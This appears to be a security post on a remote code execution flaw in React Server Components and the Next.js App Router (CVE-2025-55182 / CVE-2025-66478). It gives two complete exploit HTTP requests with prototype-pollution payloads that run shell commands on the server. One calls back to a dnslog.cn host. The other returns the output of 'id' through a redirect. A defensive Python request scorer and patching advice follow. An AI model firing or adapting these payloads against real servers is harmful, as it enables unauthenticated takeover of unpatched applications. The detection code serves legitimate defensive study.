
Next.js / React Server Components Remote Code Execution Vulnerability

Introduction

React Server Components remote code execution vulnerability (CVE-2025-55182)

Next.js React Server Components remote code execution vulnerability (CVE-2025-66478)

React Server Components (RSC) is the server-side rendering and component streaming mechanism of React 19, released as a stable version on 5 December 2024. It resolves components and model data on the server and emits the rendered result. In affected versions, RSC performs no adequate validation when deserializing ReplyFlightStream data: an attacker can supply arbitrary model fields, cyclic structures, Server References and multipart/form-data that steer the parser down an abnormal path and trigger a module-loading and reference-execution chain, ultimately resulting in unauthenticated code execution.

Next.js is an open-source web framework built on React for SSR, static sites and hybrid-rendered applications. In affected versions, the Next.js App Router hands client-supplied RSC serialized data straight to the RSC deserializer; because of the ReplyFlightStream deserialization flaw described above, an attacker can craft a malicious request that ultimately results in unauthenticated code execution.

POC

Dify has fallen; GitHub PoC (blind RCE, no echoed output)

https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3

POST /apps HTTP/1.1
Host: 10.166.8.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 585

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('ping zrodr5.dnslog.cn');","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

EXP with echoed output

POST /apps HTTP/1.1
Host: 10.166.8.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 585

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
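As an added defender-side example (not from the original post or the linked gist), the following Python scores an incoming Server Action POST for the markers visible in the two requests above: a Next-Action header plus a multipart part whose Flight reply references the prototype chain ("$1:__proto__:then", "$1:constructor:constructor") and carries a client-supplied thenable with Flight-internal fields. The sample body is constructed, mirrors the request shape above with the command removed, and the boundary value is an assumption.

```python
import json
import re
# Flight references into the prototype chain, as in "$1:__proto__:then" above.
PROTO_REF = re.compile(r'"\$\d+:(?:__proto__|constructor|prototype)(?::|")')
# Flight-internal field names that a client-supplied argument object should never carry.
INTERNAL_KEYS = {"then", "status", "_response", "_prefix", "_chunks", "_formData"}

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal text-only multipart/form-data parser: returns {name: value}."""
    parts = {}
    for chunk in body.replace("\r\n", "\n").split("--" + boundary):
        head, _, value = chunk.strip().partition("\n\n")
        name = re.search(r'name="([^"]*)"', head)  # preamble/closing "--" have no name
        if name:
            parts[name.group(1)] = value.strip()
    return parts

def score_action_request(headers: dict, body: str) -> list:
    """Return findings for a Server Action POST; an empty list means no markers seen."""
    hdrs = {k.lower(): v for k, v in headers.items()}
    m = re.search(r"boundary=(.+)$", hdrs.get("content-type", ""))
    if "next-action" not in hdrs or not m:  # only action posts carry a Flight reply body
        return []
    findings = []
    for name, value in parse_multipart(body, m.group(1).strip()).items():
        if PROTO_REF.search(value):
            findings.append(f"part {name}: reference into prototype chain")
        try:
            obj = json.loads(value)
        except ValueError:
            continue
        if isinstance(obj, dict) and "then" in obj:  # a thenable arriving as plain data
            hit = sorted(INTERNAL_KEYS & set(obj))
            findings.append(f"part {name}: thenable with Flight-internal fields {hit}")
    return findings

# Constructed sample mirroring the request shape above, with the command removed.
BOUNDARY = "----WebKitFormBoundaryConstructed"
HEADERS = {"Next-Action": "x", "Content-Type": f"multipart/form-data; boundary={BOUNDARY}"}
SUSPICIOUS_BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="0"\r\n\r\n'
    '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
    '"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"/* removed */",'
    '"_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n'
    f"--{BOUNDARY}--\r\n"
)
# Ordinary action call with a plain argument: must produce no findings.
BENIGN_BODY = f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="0"\r\n\r\n["hello"]\r\n--{BOUNDARY}--\r\n'
```

A WAF or reverse proxy rule built on the same two checks (Next-Action present, and a form-data part matching PROTO_REF) can flag requests of this shape before they reach the application; patching to a fixed React/Next.js release remains the actual remediation.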